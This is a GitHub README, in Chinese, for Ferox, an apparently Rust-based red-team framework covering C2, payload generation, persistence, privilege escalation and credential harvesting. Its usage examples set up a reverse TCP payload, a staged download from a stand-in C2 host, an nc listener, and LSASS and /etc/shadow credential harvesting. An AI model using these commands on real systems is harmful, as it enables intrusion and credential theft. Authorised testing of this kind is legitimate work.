abdulwahed-sweden/ferox

GitHub: abdulwahed-sweden/ferox

一款基于 Rust 的综合性攻击性安全框架,为授权渗透测试和红队行动提供从侦察到后渗透的全流程工具链。

Stars: 1 | Forks: 0

# 🦊 Ferox Security Framework v4.1 [![Rust](https://img.shields.io/badge/Rust-2021%20Edition-orange)]() [![License](https://img.shields.io/badge/License-MIT-blue)]() [![Status](https://img.shields.io/badge/Status-Production%20Ready-success)]() [![Version](https://img.shields.io/badge/Version-4.1.0-brightgreen)]() **Ferox** 是一个现代的 Rust 原生攻击性安全框架,专为授权的渗透测试、安全研究和红队行动而设计。在构建时充分考虑了性能、安全性和可观测性。 ## 4.1 版本更新内容 - **代码现代化** - 更新至 Rust 2021 版本,所有依赖均为最新 - **移动应用分析** - APK 和 IPA 安全评估模块 - **安全评估向导** - 用于全面评估的向导式工作流 - **增强的进度跟踪** - 实时进度与发现展示 - **桌面应用程序** - 基于 React 的现代 Tauri 界面 ## 🚀 快速开始 ### 安装 ``` git clone https://github.com/abdulwahed-sweden/ferox cd ferox cargo build --release --features memory-forensics ``` ### 首次运行 ``` # 系统诊断 ./target/release/ferox doctor check # 启动 console ./target/release/ferox console # 内存取证 ./target/release/ferox memory analyze dump.raw --output report.json ``` ## 🎯 核心功能 ### 🔍 内存取证 - Volatility3 集成 - YARA 扫描 - MITRE ATT&CK 映射 - 导出格式:JSON, Markdown, 表格 ### 🛰️ 命令与控制 (C2) - Teams Tunnel C2 - HTTP beacon - DNS C2 - 中继管理器 ### 🎯 智能 Payload 系统 (Phase 4) - **无文件 Reverse TCP**,采用 AES-256-GCM 加密 - **多阶段 payload**(Stage-1 stager + Stage-2 payload) - **跨平台支持**:Windows, Linux, macOS, Universal - **执行命令生成器**:针对不同操作系统提供可直接粘贴的命令 - **Listener 命令助手**:Netcat, Socat, Metasploit, Python - **C2 集成**:Teams, GitHub Gist, DNS-over-HTTPS, HTTP Beacon ### 📱 移动应用分析 (4.0 版本新增) - **APK 分析器** - Android 应用安全分析 - Manifest 解析与权限分析 - 代码反编译与机密信息检测 - 网络安全配置分析 - 证书验证检查 - **IPA 分析器** - iOS 应用安全分析 - Info.plist 分析与 entitlements 提取 - 二进制保护检查 (PIE, ARC, stack canaries) - URL scheme 与 deep link 分析 - 第三方 SDK 检测 - **应用侦察** - 应用商店情报收集 ### 🔧 安全操作 - 侦察 (ASN, DNS, WHOIS, 子域名) - 高速扫描 - 漏洞利用(授权) - 后渗透:凭据、持久化、横向移动 ### 🔒 后渗透引擎 (Phase 5) - **持久化引擎**:具备 14 种方法的多平台持久化 - Windows: Registry Run, Scheduled Tasks, WMI Events, Services, Startup Folder - Linux: Cron, Systemd, Shell RC, XDG Autostart - macOS: Launch Agents/Daemons, Login Items - 根据权限和隐蔽性要求自动选择 - 内置冗余支持 - **权限提升引擎**:全面的 privesc 枚举 - Windows: UAC Bypass (fodhelper, eventvwr, sdclt), Token Impersonation, Service Exploits - Linux: Sudo abuse, SUID/SGID binaries, Kernel exploits, Capabilities - 为所有技术提供 MITRE ATT&CK 映射 - GTFOBins 集成参考 - **凭据收集引擎**:多源凭据提取 - Windows: LSASS, SAM, Credential Manager, 浏览器密码 - Linux: /etc/shadow, SSH keys, GNOME Keyring, 浏览器凭据 - macOS: Keychain, 浏览器密码 - 跨平台:云凭据 (AWS/Azure/GCP), Git token - 敏感度分类与脱敏支持 ### 🗂 系统管理 - SQLite 会话跟踪 - 防篡改审计日志 - 针对危险模块的安全模式 - 基于策略的授权 ## 🛠️ 使用示例 ### 交互式控制台 ``` ferox> use scanner/port ferox (scanner/port)> set RHOSTS 10.0.0.0/24 ferox (scanner/port)> set PORTS 1-1000 ferox (scanner/port)> run --json > scan_results.json ``` ### 内存分析 ``` ferox memory analyze memory.dmp --database analysis.db ferox memory malfind memory.dmp --min-score 0.6 --mitre ferox memory pslist memory.dmp --format table ``` ### 系统诊断 ``` ferox doctor check --critical ferox doctor check --format json ferox doctor dependency python ferox doctor dependency volatility ``` ### C2 操作 ``` ferox c2 list --status active ferox c2 setup teams_tunnel --team-id "security-team" ferox c2 test http_beacon --target http://target.com ``` ### 智能 Payload 生成 ``` # 交互式 payload 生成 ferox> use payloads/rev_tcp_fileless ferox (payloads/rev_tcp_fileless)> set LHOST 192.168.1.100 ferox (payloads/rev_tcp_fileless)> set LPORT 4444 ferox (payloads/rev_tcp_fileless)> set TARGET_OS windows ferox (payloads/rev_tcp_fileless)> run # 输出包括: # - 加密 payload (Base64/Hex) # - 可直接粘贴的执行命令: # - PowerShell Base64 解码并执行 # - PowerShell 编码命令 # - 通过 PowerShell 执行 CMD # - Listener 命令: # - nc -lvnp 4444 # - msfconsole multi/handler # 带有 C2 的 Staged payload ferox (payloads/rev_tcp_fileless)> set STAGED true ferox (payloads/rev_tcp_fileless)> set C2_URL https://c2.example.com/stage2 ferox (payloads/rev_tcp_fileless)> run ``` ### 持久化引擎 ``` # 列出所有 persistence 方法 ferox persist list # 自动安装 persistence(安全模式) ferox persist auto --platform windows --payload /path/to/agent --redundancy 2 # 显示方法详情 ferox persist describe registry_run_hkcu # 验证/移除 persistence ferox persist verify ferox persist remove ``` ### 权限提升引擎 ``` # 列出可用的 enumerators ferox privesc list # 自动 enumerate 并 exploit(安全模式) ferox privesc auto --platform windows --command cmd.exe # 对特定平台进行 enumerate ferox privesc enumerate --platform linux --category sudo # 显示技术详情 ferox privesc describe uac_bypass ``` ### 凭据收集引擎 ``` # 列出可用的 harvesters ferox creds list --platform windows # Harvest 凭据(安全模式) ferox creds harvest --platform linux --category all # 按类别筛选 ferox creds harvest --platform windows --category browser # 显示 harvester 详情 ferox creds describe lsass_memory # 显示 harvested 凭据 ferox creds show ``` ### 移动应用分析 ``` # Android APK 分析 ferox> use mobile/apk_analyzer ferox (mobile/apk_analyzer)> set APK_PATH /path/to/app.apk ferox (mobile/apk_analyzer)> run # iOS IPA 分析 ferox> use mobile/ipa_analyzer ferox (mobile/ipa_analyzer)> set IPA_PATH /path/to/app.ipa ferox (mobile/ipa_analyzer)> run # App Store 侦察 ferox> use mobile/app_recon ferox (mobile/app_recon)> set BUNDLE_ID com.example.app ferox (mobile/app_recon)> run ``` ### 安全评估向导 ``` # 启动交互式向导 ferox> wizard # 选择评估模板: # 1. 全面 Penetration Test # 2. Web 应用评估 # 3. 网络安全审计 # 4. 移动应用评估 # 5. Cloud 安全审查 ``` ## 🎨 界面 — 混合 Predator 主题 - 深色、高对比度安全配色 - 极简动画(平静的 UI) - 终端优化排版 - 清晰的状态符号 (✅ ❌ ⚠️ ℹ️) ## 🛡️ 安全模式示例 ``` SAFE_MODE=1 ferox --mock run c2/teams_tunnel SAFE_MODE=1 ferox console ``` ## 🔧 架构 ``` Ferox CLI Integration Layer ↓ [doctor, memory, c2, sessions, persist, privesc, creds, console] ↓ Module Registry & Session Manager ↓ Security Engine (Async Rust) ↓ [Scanner, Recon, Exploit, Payloads, Memory, C2, Post, Auxiliary] ↓ ┌─────────────────────────────────────────────────────────────┐ │ Smart Payload Engine (AES-256-GCM, HKDF, Multi-Stage) │ │ Persistence Engine (14 methods, 3 platforms) │ │ Privilege Escalation Engine (7 enumerators, 2+ exploits) │ │ Credential Harvesting Engine (12 harvesters, 3 platforms) │ └─────────────────────────────────────────────────────────────┘ ``` ## 📦 模块类别 | 类别 | # | 描述 | | --------------------- | --- | ----------------------------------------------- | | Scanner | 8 | 端口与服务检测 | | Recon | 6 | 信息收集 | | **Mobile** | 3 | APK/IPA 分析,应用侦察 | | Exploit | 4 | 授权漏洞利用 | | **Payloads** | 3 | 带加密的智能 payload 生成 | | Memory Forensics | 8 | Volatility3 工作流 | | **Post-Exploitation** | 33+ | 持久化 (14), 权限提升 (7), 凭据 (12) | | C2 & Evasion | 12 | 通信与隐匿 | | Auxiliary | 5 | 实用工具模块 | ## 🩺 Ferox Doctor — 诊断引擎 ``` # 全面检查 ferox doctor check # Dependency 检查 ferox doctor dependency python ferox doctor dependency volatility # 自动修复(在支持的情况下) ferox doctor check --fix # 格式 ferox doctor check --format json ferox doctor check --format markdown ``` ## 🔒 安全与授权 **Ferox 专为授权的安全工作而设计。** ### 允许 - 授权的渗透测试 - 红队评估 - 安全研究 - CTF - 防御性培训 ### 禁止 - 未经授权的访问 - 犯罪活动 - 恶意操作 - 违反法律/法规 ### 内置安全防护 - 授权上下文 - 不可变审计日志 - 针对高风险模块的安全模式 - 基于策略的访问控制 ## 🖥️ Ferox 桌面版 使用 Tauri 和 React 构建的专业 C2 操作控制台: ``` cd ferox-desktop npm install cargo tauri dev # Development cargo tauri build # Production build ``` **功能:** - 具备实时更新的实时会话管理 - 带有命令历史记录的集成终端 - 后渗透模块仪表盘 - 会话树可视化 - 为操作优化的深色主题。 详情请参阅[桌面版文档](docs/developer/architecture.md)。 ## 📚 文档 - [docs/README.md](docs/README.md) — 文档索引 - [docs/INSTALLATION.md](docs/INSTALLATION.md) — 安装指南 - [docs/user-guide/](docs/user-guide/) — 最终用户文档 - [docs/developer/](docs/developer/) — 开发者文档 - [docs/api/](docs/api/) — API 参考 ## 🛣️ 路线图 - [x] v2.0.0 – 内存取证引擎 - [x] **Phase 4** – 带有执行命令生成器的智能 Payload 系统 - [x] **Phase 5** – 后渗透引擎(持久化、权限提升、凭据) - [x] **Phase 6** – Ferox 桌面版(Tauri + React 操作控制台) - [x] **v4.0.0** – 移动应用分析 (APK/IPA) 与安全评估向导 - [ ] 签名插件市场 - [ ] 硬件支持的凭据保险库 - [ ] 扩展的规避技术 ## 📄 许可证 在 MIT 许可证下发布。仅限于符合道德规范和授权的场景使用。 ## 📬 支持 - 维护者:Abdulwahed Mansour - 邮箱:abdulwahed.mansour@gmail.com - 安全联系人:security@ferox.local - GitHub:@abdulwahed-sweden 快速。凶猛。无畏。已授权。🦊
标签:C2框架, DNS 反向解析, IP 地址批量处理, Rust, SecList, 内存取证, 可视化界面, 安全学习资源, 渗透测试框架, 移动应用分析, 网络流量审计, 通知系统, 防御